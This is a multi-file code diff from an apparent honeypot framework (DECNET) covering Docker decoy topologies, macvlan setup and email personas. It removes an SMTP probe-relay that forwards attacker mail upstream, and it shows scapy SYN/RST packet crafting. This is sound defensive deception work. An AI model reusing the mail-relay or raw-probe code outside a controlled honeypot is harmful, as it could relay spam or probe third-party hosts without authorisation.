            topology_id, decky_name, exc,
        )
# ------------------------------------------------------------------- ops
@@ -588,16 +131,6 @@ async def apply_add_lan(
"y": payload.get("y"),
}
)
# Live materialisation: when the topology is active/degraded, create
# the docker bridge network now and re-render the per-topology
# compose file so subsequent ``apply_add_decky`` writes a coherent
# services map. Pending topologies skip this — the next deploy
# creates everything from scratch. Agent-pinned topologies also
# skip; live editing on agents is its own routing problem.
await _materialise_lan_change(
repo, topology_id, created=(name, subnet, is_dmz),
)
await _assert_valid_after(repo, topology_id)
@@ -617,17 +150,7 @@ async def apply_remove_lan(
f"LAN {lan['name']!r} is the home LAN of decky "
f"{d['decky_config']['name']!r}; remove the decky first"
)
lan_name = lan["name"]
# enforce_pending=False: the mutator queue is the live-editing
# surface, gated on topology status by us before we got here. The
# repo's pending-only guard is for HTTP CRUD callers that mustn't
# bypass it.
await repo.delete_lan(lan["id"], enforce_pending=False)
# Live materialisation symmetric to apply_add_lan: tear down the
# docker bridge and re-render compose so a future redeploy doesn't
# try to wire deckies into a network that no longer exists.
await _materialise_lan_change(repo, topology_id, removed=lan_name)
await repo.delete_lan(lan["id"])
await _assert_valid_after(repo, topology_id)
@@ -681,12 +204,11 @@ async def apply_add_decky(
if forwards_l3:
decky_config["forwards_l3"] = True
services_list = list(payload.get("services", []))
decky_uuid = await repo.add_topology_decky(
{
"topology_id": topology_id,
"name": name,
"services": services_list,
"services": list(payload.get("services", [])),
"decky_config": decky_config,
"x": payload.get("x"),
"y": payload.get("y"),
@@ -701,25 +223,6 @@ async def apply_add_decky(
"forwards_l3": forwards_l3,
}
)
# Live materialisation: spawn the new decky's containers without
# touching siblings. Skips on pending / agent-pinned topologies —
# see _live_topology_or_none.
spawned = await _materialise_decky_spawn(
repo, topology_id, name, services_list,
)
# Flip the row's state to 'running' on success so the dashboard's
# ACTIVE DECKIES count reflects reality. Without this the row
# stays at the default 'pending' forever; the deployer's full
# post-deploy reconcile only runs on a fresh deploy_topology.
if spawned:
try:
await repo.update_topology_decky(decky_uuid, {"state": "running"})
except Exception as exc: # noqa: BLE001
_log.warning(
"live add_decky: state flip to running failed "
"topology=%s decky=%s: %s",
topology_id, name, exc,
)
await _assert_valid_after(repo, topology_id)
@@ -783,16 +286,6 @@ async def apply_attach_decky(
"forwards_l3": forwards_l3,
}
)
# Live materialisation: SDK network.connect on the base container.
# Service containers share the base's netns via network_mode:
# service:<base>, so they inherit the new interface — only the base
# needs the connect.
await _materialise_decky_connect(
repo, topology_id,
decky_name=decky["decky_config"]["name"],
lan_name=lan["name"],
ipv4_address=ip,
)
await _assert_valid_after(repo, topology_id)
@@ -836,15 +329,7 @@ async def apply_detach_decky(
await repo.update_topology_decky(
decky["uuid"], {"decky_config": new_cfg}
)
await repo.delete_topology_edge(edge["id"], enforce_pending=False)
# Live materialisation: SDK network.disconnect on the base
# container. Service containers automatically lose visibility into
# the LAN because they share the base's netns.
await _materialise_decky_disconnect(
repo, topology_id,
decky_name=decky["decky_config"]["name"],
lan_name=lan["name"],
)
await repo.delete_topology_edge(edge["id"])
await _assert_valid_after(repo, topology_id)
@@ -855,15 +340,7 @@ async def apply_remove_decky(
decky = _decky_by_name(hydrated, payload["decky"])
if decky is None:
raise MutationError(f"decky {payload['decky']!r} not found")
decky_name = decky["decky_config"]["name"]
services_list = list(decky.get("services") or [])
await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
# Live materialisation: stop + rm -f the decky's containers. We
# capture decky_name + services BEFORE the delete so the helper
# has the targets even though the row is gone.
await _materialise_decky_remove(
repo, topology_id, decky_name, services_list,
)
await repo.delete_topology_decky(decky["uuid"])
await _assert_valid_after(repo, topology_id)
@@ -877,136 +354,31 @@ async def apply_update_decky(
``patch`` — dict merged into existing ``decky_config``.
``services`` — replacement top-level services list.
``x``,``y`` — layout coords.
``force`` — opt-in for destructive recreates (currently
required when ``forwards_l3`` flips on a
live topology — see below).
Live materialisation strategy:
* **services changed** → diff old vs new; ``compose up -d`` for
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
direct API path (services_live) without coupling.
* **forwards_l3 flipped** → port publishing changes, which docker
can only apply at container-create time. Requires recreating
the base — destructive (kills in-container state, drops active
sessions). Gated on ``payload['force'] is True``; otherwise we
raise ``MutationError`` so a half-thinking operator doesn't
stomp a live decky.
* **only coords (x/y)** → DB-only. No docker work.
"""
hydrated = await _hydrated(repo, topology_id)
decky = _decky_by_name(hydrated, payload["decky"])
if decky is None:
raise MutationError(f"decky {payload['decky']!r} not found")
# Capture pre-state so we can compute the diff after the DB write.
old_services = list(decky.get("services") or [])
old_cfg = decky.get("decky_config") or {}
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
patch: dict[str, Any] = {}
new_decky_config = old_cfg
if payload.get("patch"):
new_decky_config = {**old_cfg, **payload["patch"]}
patch["decky_config"] = new_decky_config
new_services = old_services
merged = dict(decky["decky_config"])
merged.update(payload["patch"])
patch["decky_config"] = merged
if "services" in payload:
new_services = list(payload["services"])
patch["services"] = new_services
patch["services"] = list(payload["services"])
for key in ("x", "y"):
if key in payload:
patch[key] = payload[key]
if not patch:
return
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
# 'gateway' semantic specifically means 'host-port publisher facing
# the DMZ' — running it on an internal LAN publishes ports the
# outside world can't reach and shadows the host's port space.
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
# the generator/attach paths, not by this op, so this check only
# fires when the operator explicitly toggles the flag.
if forwards_l3_flipped and new_forwards_l3:
# Re-derive the home LAN from the edges; same logic as
# check_gateway_homed_in_dmz.
decky_uuid = decky["uuid"]
home_lan_id: Optional[str] = None
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
home_lan_id = e["lan_id"]
break
if home_lan_id is None:
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid:
home_lan_id = e["lan_id"]
break
home_lan = next(
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
None,
)
if home_lan is None or not home_lan.get("is_dmz"):
home_name = home_lan["name"] if home_lan else "(unknown)"
raise MutationError(
f"cannot promote decky {decky['decky_config']['name']!r} "
f"to gateway: home LAN {home_name!r} is not a DMZ. "
"Move the decky to the DMZ first, or pick a different decky."
)
# Pre-check the destructive flip BEFORE any DB write, so a refused
# mutation leaves zero side-effects.
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
raise MutationError(
f"forwards_l3 flip on live decky "
f"{decky['decky_config']['name']!r} requires force=true; "
"this will recreate the base container and drop in-container state"
)
await repo.update_topology_decky(decky["uuid"], patch)
# Materialisation — only when the topology is actually live.
# _live_topology_or_none was already called above; calling the
# individual helpers re-checks (cheap) so they stay self-contained.
decky_name = decky["decky_config"]["name"]
added = sorted(set(new_services) - set(old_services))
removed = sorted(set(old_services) - set(new_services))
if added or removed:
await _materialise_decky_services_diff(
repo, topology_id, decky_name, added, removed,
)
if forwards_l3_flipped:
# force was checked above; reaching here means the operator
# opted in. recreate_base re-renders compose first so the
# rebuilt base picks up the new `ports:` block.
await _materialise_decky_recreate_base(
repo, topology_id, decky_name,
)
await _assert_valid_after(repo, topology_id)
async def apply_update_lan(
repo: Any, topology_id: str, payload: dict[str, Any]
) -> None:
"""Update LAN fields — subnet, is_dmz, coords, rename.
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
Live deckies bind to the bridge with IPs allocated from the old
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
flag, which docker can't change on a network with active
containers). Reject those mutations on active/degraded topologies
rather than rewriting the DB into an incoherent state.
Coord-only updates (``x``/``y``) are layout-only; let them through
unconditionally. Renames pass through too — the bridge's docker
name is keyed off ``_network_name(topology_id, lan_name)``, so a
rename would also need a rebuild — but rename isn't currently a
code path on active topologies; if the operator hits it we still
write the row and let the next deploy reconcile.
"""
"""Update LAN fields — subnet, is_dmz, coords, rename."""
hydrated = await _hydrated(repo, topology_id)
lan = _lan_by_name(hydrated, payload["name"])
if lan is None:
@@ -1017,17 +389,6 @@ async def apply_update_lan(
fields[key] = payload[key]
if not fields:
return
topology = await repo.get_topology(topology_id)
is_live = bool(topology) and topology.status in ("active", "degraded")
if is_live:
hostile = {"subnet", "is_dmz"} & fields.keys()
if hostile:
raise MutationError(
f"cannot change {sorted(hostile)} on a deployed LAN; "
f"teardown + redeploy required"
)
await repo.update_lan(lan["id"], fields)
await _assert_valid_after(repo, topology_id)

View File

@@ -151,20 +151,11 @@ def _ensure_network(
options.update(extra_options)
for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
# networks.list() doesn't populate Containers — reload to get the
# full inspect payload (including connected container IDs).
try:
net.reload()
except docker.errors.APIError:
pass
if net.attrs.get("Driver") == driver:
# Same driver — but if the IPAM pool drifted (different subnet,
# gateway, or ip-range than this deploy asks for), reusing it
# hands out addresses from the old pool and we race the real LAN.
# Compare and rebuild on mismatch — but only when no containers
# are attached. With active endpoints Docker refuses the remove
# with 403; just attach to the existing network instead.
# Compare and rebuild on mismatch.
pools = (net.attrs.get("IPAM") or {}).get("Config") or []
cur = pools[0] if pools else {}
if (
@@ -173,15 +164,8 @@ def _ensure_network(
and cur.get("IPRange") == ip_range
):
return # right driver AND matching pool, leave it alone
if net.attrs.get("Containers"):
# Active endpoints — can't safely rebuild. Attach to the
# existing network; IPAM drift on ip_range only affects
# Docker's auto-assign pool, which DECNET doesn't use
# (IPs are always set explicitly in the compose file).
return
# Driver mismatch OR empty-endpoint IPAM drift — tear it down.
# Disconnect any live containers first so `remove()` doesn't
# refuse with ErrNetworkInUse.
# Driver mismatch OR IPAM drift — tear it down. Disconnect any live
# containers first so `remove()` doesn't refuse with ErrNetworkInUse.
for cid in (net.attrs.get("Containers") or {}):
try:
net.disconnect(cid, force=True)
@@ -319,44 +303,11 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
# Host-side macvlan interface (hairpin fix)
# ---------------------------------------------------------------------------
# Linux capability bit positions — see capabilities(7).
_CAP_NET_ADMIN = 12
def _has_cap_net_admin() -> bool:
"""True if the current process holds CAP_NET_ADMIN in its effective set.
Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we
don't need a libcap dependency. ``CapEff`` is a 64-bit hex bitmask;
bit 12 is CAP_NET_ADMIN.
"""
try:
with open("/proc/self/status", "r") as fh:
for line in fh:
if line.startswith("CapEff:"):
bits = int(line.split()[1], 16)
return bool(bits & (1 << _CAP_NET_ADMIN))
except OSError:
pass
return False
def _require_net_admin() -> None:
    """Fail fast when the process may not create macvlan/ipvlan links.

    Passes when the effective UID is 0 or when ``_has_cap_net_admin()``
    reports the capability, so a service granted only CAP_NET_ADMIN
    (e.g. via systemd ``AmbientCapabilities``) does not have to run as root.

    Raises:
        PermissionError: neither condition holds.
    """
    # Root check first: it short-circuits the /proc read.
    permitted = os.geteuid() == 0 or _has_cap_net_admin()
    if not permitted:
        raise PermissionError(
            "MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
            "Either run as root or grant the cap (systemd: "
            "AmbientCapabilities=CAP_NET_ADMIN)."
        )
def _require_root() -> None:
if os.geteuid() != 0:
raise PermissionError(
"MACVLAN host-side interface setup requires root. Run with sudo."
)
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
@@ -366,9 +317,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
host-helper first: the two drivers can share a parent NIC on paper but
leaving the opposite helper in place is just cruft after a driver swap.
"""
_require_net_admin()
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
_require_root()
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -383,7 +332,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
def teardown_host_macvlan(decky_ip_range: str) -> None:
_require_net_admin()
_require_root()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -395,9 +344,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
host-helper first so a prior macvlan deploy doesn't leave its slave
dangling on the parent NIC after the driver swap.
"""
_require_net_admin()
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
_require_root()
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -411,7 +358,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
def teardown_host_ipvlan(decky_ip_range: str) -> None:
_require_net_admin()
_require_root()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -431,47 +378,3 @@ def ips_to_range(ips: list[str]) -> str:
strict=False,
)
return str(network)
# ---------------------------------------------------------------------------
# Container veth resolution (for tc netem tarpit)
# ---------------------------------------------------------------------------
def get_container_pid(container_name: str) -> int:
    """Return the PID of a running container's init process.

    Args:
        container_name: Name passed to ``client.containers.get``.

    Returns:
        The value of ``State.Pid`` from the container's attributes.

    Raises:
        LookupError: the container does not exist, or its recorded PID is
            falsy (0), meaning it is not running.
    """
    client = docker.from_env()
    try:
        try:
            container = client.containers.get(container_name)
        except docker.errors.NotFound as exc:
            # Chain the SDK error so the original cause stays in tracebacks.
            raise LookupError(f"container {container_name!r} not found") from exc
        pid = container.attrs["State"]["Pid"]
    finally:
        # Each call builds its own client; release its connections so
        # repeated lookups don't accumulate open sockets.
        client.close()
    if not pid:
        raise LookupError(f"container {container_name!r} is not running (PID=0)")
    return pid
def get_container_veth(container_name: str) -> str:
    """Return the host-side veth interface paired with the container's eth0.

    Runs ``docker exec <container> cat /sys/class/net/eth0/iflink`` to learn
    the peer interface index, then scans ``ip link show`` on the host for
    the line that begins with that index and extracts the interface name
    (the part before any ``@ifNN`` suffix).

    Raises:
        LookupError: the ``docker exec`` call exits non-zero, or no host
            link line starts with the peer index.
    """
    probe = _run(
        ["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
        check=False,
    )
    if probe.returncode != 0:
        raise LookupError(
            f"container {container_name!r} not reachable: {probe.stderr.strip()}"
        )

    peer_index = probe.stdout.strip()
    wanted_prefix = f"{peer_index}:"
    host_links = _run(["ip", "link", "show"]).stdout.splitlines()
    hit = next((row for row in host_links if row.startswith(wanted_prefix)), None)
    if hit is None:
        raise LookupError(
            f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
        )

    # Format: "42: veth3a4b5c@if41: <BROADCAST,...>" — take the field between
    # the first two colons, then drop the "@ifNN" peer suffix.
    name_field = hit.partition(":")[2].partition(":")[0]
    return name_field.strip().partition("@")[0]

View File

@@ -65,7 +65,7 @@ def get_driver_for(action: Action) -> ActivityDriver:
try:
from decnet.orchestrator.emailgen.scheduler import EmailAction
except ImportError: # pragma: no cover - scheduler always exists
EmailAction = None # type: ignore[assignment, misc]
EmailAction = None # type: ignore[assignment]
if EmailAction is not None and isinstance(action, EmailAction):
from decnet.orchestrator.drivers.email import EmailDriver
return EmailDriver()

View File

@@ -176,7 +176,7 @@ class EmailDriver(ActivityDriver):
"""Convenience accessor for telemetry / logging."""
return self._llm.model
async def run(self, action: EmailAction) -> ActivityResult: # type: ignore[override]
async def run(self, action: EmailAction) -> ActivityResult:
return await self._run_email(action)
async def _run_email(self, action: EmailAction) -> ActivityResult:

View File

@@ -1,80 +0,0 @@
"""SMTP probe-relay driver.
Forwards the attacker's first probe email via the master's real internet
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
the master (where this worker runs) does.
Called by the realism worker's smtp probe listener, not the main tick loop.
"""
from __future__ import annotations
import email
import smtplib
from pathlib import Path
from typing import Any
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
"""Return body with a From: header added if one is absent."""
try:
msg = email.message_from_bytes(body)
except Exception:
return body
if msg["From"]:
return body
# Prepend the header before the existing content.
header_line = f"From: {mail_from}\r\n".encode()
return header_line + body
def forward_probe(
    *,
    svc_cfg: dict[str, Any],
    stored_as: str,
    decky_name: str,
    mail_from: str,
    rcpt_to: list[str],
    artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
) -> tuple[bool, str]:
    """Read the stored .eml from disk and forward it via the upstream relay.

    Args:
        svc_cfg: smtp_relay service config. Keys read here:
            ``upstream_host`` (required), ``upstream_port`` (default 25),
            ``upstream_user`` / ``upstream_pass`` (login only when both are
            non-empty) and ``upstream_sender`` (envelope sender override).
        stored_as: File name of the message under
            ``<artifacts_root>/<decky_name>/smtp/``.
        decky_name: Decky whose artifact directory holds the message.
        mail_from: Attacker-supplied sender; used as the envelope sender
            when ``upstream_sender`` is unset, and as the ``From:`` header
            when the message has none.
        rcpt_to: Envelope recipients.
        artifacts_root: Root directory of stored artifacts.

    Returns:
        ``(True, "")`` on success or ``(False, reason)`` on failure. No
        exception escapes for configuration, disk or SMTP errors, so the
        function is safe to run in a worker thread (blocking I/O only).
    """
    upstream_host = (svc_cfg.get("upstream_host") or "").strip()
    if not upstream_host:
        return False, "upstream_host not configured"

    # NOTE(review): stored_as / decky_name are joined into the path
    # unchecked — confirm callers never pass values containing "..".
    eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
    try:
        body = eml_path.read_bytes()
    except OSError as exc:
        return False, f"cannot read eml: {exc}"

    if not rcpt_to:
        return False, "no recipients"

    # A malformed port in operator config must surface as a failure
    # reason, not as an exception out of this function.
    raw_port = svc_cfg.get("upstream_port")
    try:
        upstream_port = int(raw_port or 25)
    except (TypeError, ValueError):
        return False, f"invalid upstream_port: {raw_port!r}"[:256]

    upstream_user = (svc_cfg.get("upstream_user") or "").strip()
    upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
    envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from

    # Ensure the message has a From: header so mail clients show the attacker's
    # address rather than falling back to the envelope sender (upstream_sender).
    # Minimal relay-test scripts often omit headers entirely.
    body = _ensure_from_header(body, mail_from)

    try:
        with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
            conn.ehlo()
            if conn.has_extn("STARTTLS"):
                conn.starttls()
                # Re-issue EHLO after the TLS upgrade before continuing.
                conn.ehlo()
            if upstream_user and upstream_pass:
                conn.login(upstream_user, upstream_pass)
            conn.sendmail(envelope_from, rcpt_to, body)
        return True, ""
    except Exception as exc:
        # Cap the reason so an oversized server reply can't bloat the result.
        return False, str(exc)[:256]

View File

@@ -18,8 +18,11 @@ or IP can't escape into a shell.
from __future__ import annotations
import asyncio
import shlex
from typing import Any
from datetime import datetime
import base64
from datetime import datetime, timezone
from decnet.logging import get_logger
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
@@ -223,24 +226,36 @@ class SSHDriver(ActivityDriver):
) -> ActivityResult:
"""Write *content* to *path* inside *decky_name*'s ssh container.
Delegates to :func:`decnet.decky_io.write_file_to_container`,
which carries the ARG_MAX-safe base64-via-stdin trick. Sets
file mode and, when *mtime* is provided, ``touch -d`` to
backdate the file (otherwise everything stamps at wall-clock-now
— the realism failure this path was originally fixing).
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and,
when *mtime* is provided, ``touch -d`` to backdate the file so
it doesn't all stamp at wall-clock-now (the realism failure
this migration is fixing).
"""
from decnet.decky_io import write_file_to_container
container = _container_for(decky_name)
success, error = await write_file_to_container(
container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
b64 = base64.b64encode(content).decode("ascii")
# touch -d accepts ISO 8601; we always emit UTC so the
# container's local TZ doesn't drift the mtime.
if mtime is not None:
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
else:
touch_cmd = f"touch {shlex.quote(path)}"
sh_cmd = (
f"mkdir -p {shlex.quote(_dirname(path))} && "
f"base64 -d > {shlex.quote(path)} && "
f"chmod {mode:o} {shlex.quote(path)} && "
f"{touch_cmd}"
)
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
success = rc == 0
payload: dict[str, Any] = {
"dst_decky": decky_name,
"path": path,
"bytes": len(content),
"rc": 0 if success else 1,
"stderr": error if not success else None,
"rc": rc,
"stderr": stderr.strip()[:256] if not success else None,
}
return ActivityResult(success=success, payload=payload)
@@ -268,3 +283,11 @@ class SSHDriver(ActivityDriver):
)
def _dirname(path: str) -> str:
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
host to share the destination container's separator semantics, but
deckies are POSIX so a plain ``rfind('/')`` suffices."""
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]

View File

@@ -131,13 +131,13 @@ async def _resolve_personas(
topology = await repo.get_topology(topology_id)
if not topology:
return [], source
if isinstance(topology, dict):
raw = topology.get("email_personas")
lang = topology.get("language_default") or "en"
else:
raw = topology.email_personas
lang = topology.language_default or "en"
return parse_personas(raw, language_default=lang), source
return (
parse_personas(
topology.get("email_personas"),
language_default=topology.get("language_default") or "en",
),
source,
)
# Fleet / shard / anything else → global pool.
return global_pool.load(), source
@@ -175,7 +175,7 @@ async def pick(
)
return None
active = [p for p in personas if in_active_hours(p, now_dt)]
active = [p for p in personas if in_active_hours(p, now_dt.hour)]
if len(active) < 2:
logger.debug(
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",

View File

@@ -311,22 +311,17 @@ async def _resolve_personas(
return enriched
def _topology_personas(topology) -> list[EmailPersona]:
def _topology_personas(topology: Optional[dict[str, Any]]) -> list[EmailPersona]:
if not topology:
return []
if isinstance(topology, dict):
raw = topology.get("email_personas")
lang = topology.get("language_default") or "en"
else:
raw = topology.email_personas
lang = topology.language_default or "en"
raw = topology.get("email_personas")
if raw is None:
return []
if isinstance(raw, list):
return parse_personas(raw, language_default=lang)
return parse_personas(raw, language_default=topology.get("language_default") or "en")
if isinstance(raw, str):
try:
return parse_personas(json.loads(raw), language_default=lang)
return parse_personas(json.loads(raw), language_default=topology.get("language_default") or "en")
except json.JSONDecodeError:
return []
return []

View File

@@ -25,7 +25,6 @@ import secrets
from datetime import datetime, timezone
from typing import Any, Optional
from decnet.bus import topics as _topics
from decnet.bus.factory import get_bus
from decnet.bus.publish import (
publish_safely,
@@ -35,7 +34,6 @@ from decnet.bus.publish import (
from decnet.logging import get_logger
from decnet.orchestrator import events, scheduler
from decnet.orchestrator.drivers import get_driver_for
from decnet.orchestrator.drivers.smtp_relay import forward_probe
from decnet.orchestrator.emailgen import (
events as email_events,
scheduler as email_scheduler,
@@ -129,7 +127,6 @@ async def orchestrator_worker(
# operator's intent rather than the baked-in defaults. A failure
# here logs and falls through; the planner already holds defaults.
await _refresh_realism_config(repo)
await _refresh_llm_config(repo)
shutdown = asyncio.Event()
heartbeat_task = asyncio.create_task(
@@ -141,9 +138,6 @@ async def orchestrator_worker(
control_task = asyncio.create_task(
run_control_listener(bus, "orchestrator", shutdown),
)
probe_task = asyncio.create_task(
_run_smtp_probe_listener(repo, shutdown),
)
tick_n = 0
try:
while not shutdown.is_set():
@@ -162,9 +156,8 @@ async def orchestrator_worker(
await _periodic_prune(repo)
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
await _refresh_realism_config(repo)
await _refresh_llm_config(repo)
finally:
for t in (heartbeat_task, control_task, probe_task):
for t in (heartbeat_task, control_task):
t.cancel()
with contextlib.suppress(Exception, asyncio.CancelledError):
await t
@@ -225,18 +218,6 @@ async def _refresh_realism_config(repo: BaseRepository) -> None:
logger.warning("realism config refresh: rejected payload: %s", exc)
async def _refresh_llm_config(repo: BaseRepository) -> None:
    """Reload the LLM config through *repo* and apply it.

    Loads the config with ``load_from_db``; when one is returned it is
    passed to ``apply``. A failure inside ``apply`` is logged as a warning
    and swallowed so the caller keeps running with the previous settings.
    """
    from decnet.realism.llm.config import apply, load_from_db

    llm_cfg = await load_from_db(repo)
    if llm_cfg is not None:
        try:
            apply(llm_cfg)
        except Exception as err:  # noqa: BLE001
            logger.warning("llm config refresh: apply failed: %s", err)
def _roll_action_kind(rng: secrets.SystemRandom) -> str:
total = sum(w for _, w in _ACTION_WEIGHTS)
target = rng.randint(1, total)
@@ -322,7 +303,7 @@ async def _pick_action(
)
elif kind == "email":
try:
action = await email_scheduler.pick(repo, rand=rng) # type: ignore[assignment]
action = await email_scheduler.pick(repo, rand=rng)
except Exception as exc: # noqa: BLE001
logger.debug("orchestrator: email pick failed: %s", exc)
action = None
@@ -486,100 +467,6 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
async def _run_smtp_probe_listener(
    repo: BaseRepository,
    shutdown: asyncio.Event,
) -> None:
    """Subscribe to smtp ``probe.pending`` events and handle each one.

    Runs as a long-lived subtask alongside the tick loop. Every event's
    payload is handed to ``_handle_probe_pending``; a failure while
    handling one event is logged and does not stop the listener. The loop
    exits when an event arrives after *shutdown* has been set.

    Cancellation is re-raised. Any other error in the bus setup or the
    subscription loop is logged as a warning and ends the listener. The
    bus is closed on the way out if it was created.
    """
    # Bound up-front so the cleanup below never touches an unbound name
    # when get_bus() itself fails.
    bus = None
    try:
        bus = get_bus(client_name="orchestrator-probe")
        await bus.connect()
        sub = bus.subscribe(_topics.smtp("probe.pending"))
        async with sub:
            async for event in sub:
                if shutdown.is_set():
                    break
                try:
                    await _handle_probe_pending(repo, event.payload)
                except Exception as exc:  # noqa: BLE001
                    logger.warning("smtp probe listener: handle error: %s", exc)
    except asyncio.CancelledError:
        raise
    except Exception as exc:  # noqa: BLE001
        logger.warning("smtp probe listener: bus unavailable: %s", exc)
    finally:
        if bus is not None:
            # Best-effort close; a failing close must not mask the
            # original exit reason.
            with contextlib.suppress(Exception):
                await bus.close()
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
    """Forward one pending SMTP probe upstream and record the outcome.

    Steps:
      1. Read ``decky``, ``attacker_ip``, ``stored_as``, ``mail_from`` and
         the comma-separated ``rcpt_to`` from *payload*; return silently if
         any of the first three is missing.
      2. Look up the decky row and its ``smtp_relay`` service config;
         return if the decky is unknown or no ``upstream_host`` is set.
      3. Return if this (attacker_ip, decky) pair already has
         ``probe_limit`` (default 1) relays recorded.
      4. Run the blocking ``forward_probe`` in the default executor.
      5. Store a ``probe_relay`` bounty with the result and log it.
    """
    decky_name = (payload.get("decky") or "").strip()
    attacker_ip = (payload.get("attacker_ip") or "").strip()
    stored_as = (payload.get("stored_as") or "").strip()
    mail_from = (payload.get("mail_from") or "").strip()
    rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
    if not (decky_name and attacker_ip and stored_as):
        return

    decky_row = await repo.get_fleet_decky_by_name(decky_name)
    if not decky_row:
        return

    # Each level is null-guarded: a stored ``"service_config": null``
    # must be treated like a missing key rather than raising.
    decky_cfg = decky_row.get("decky_config") or {}
    service_cfg = decky_cfg.get("service_config") or {}
    svc_cfg = service_cfg.get("smtp_relay") or {}
    if not (svc_cfg.get("upstream_host") or "").strip():
        return

    probe_limit = int(svc_cfg.get("probe_limit") or 1)
    already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
    if already_sent >= probe_limit:
        return

    rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
    artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")

    # We are inside a coroutine, so the running loop is the right one to
    # use; forward_probe does blocking disk + SMTP I/O, hence the executor.
    loop = asyncio.get_running_loop()
    ok, reason = await loop.run_in_executor(
        None,
        lambda: forward_probe(
            svc_cfg=svc_cfg,
            stored_as=stored_as,
            decky_name=decky_name,
            mail_from=mail_from,
            rcpt_to=rcpt_to,
            artifacts_root=artifacts_root,
        ),
    )

    await repo.add_bounty({
        "decky": decky_name,
        "service": "smtp_relay",
        "attacker_ip": attacker_ip,
        "bounty_type": "probe_relay",
        "payload": {
            "stored_as": stored_as,
            "forwarded": ok,
            # Only attach the error text when the forward failed.
            **({"fwd_error": reason} if not ok else {}),
        },
    })
    if ok:
        logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
    else:
        logger.warning(
            "smtp probe forward failed decky=%s ip=%s error=%s",
            decky_name, attacker_ip, reason,
        )
async def _record_synthetic_file(repo, action) -> None:
"""Persist (or patch) a synthetic_files row after a FileAction plant.

View File

@@ -48,7 +48,7 @@ def _send_syn(
Craft a TCP SYN with common options and send it. Returns the
SYN-ACK response packet or None on timeout/failure.
"""
from scapy.all import IP, TCP, conf, sr1 # type: ignore[attr-defined]
from scapy.all import IP, TCP, conf, sr1
# Suppress scapy's noisy output
conf.verb = 0
@@ -83,7 +83,7 @@ def _send_syn(
return None
# Verify it's a SYN-ACK (flags == 0x12)
from scapy.all import TCP as TCPLayer # type: ignore[attr-defined]
from scapy.all import TCP as TCPLayer
if not resp.haslayer(TCPLayer):
return None
if resp[TCPLayer].flags != 0x12: # SYN-ACK
@@ -103,7 +103,7 @@ def _send_rst(
) -> None:
"""Send RST to clean up the half-open connection."""
try:
from scapy.all import IP, TCP, send # type: ignore[attr-defined]
from scapy.all import IP, TCP, send
rst = (
IP(dst=host)
/ TCP(
@@ -124,7 +124,7 @@ def _parse_synack(resp: Any) -> dict[str, Any]:
"""
Extract fingerprint fields from a scapy SYN-ACK response packet.
"""
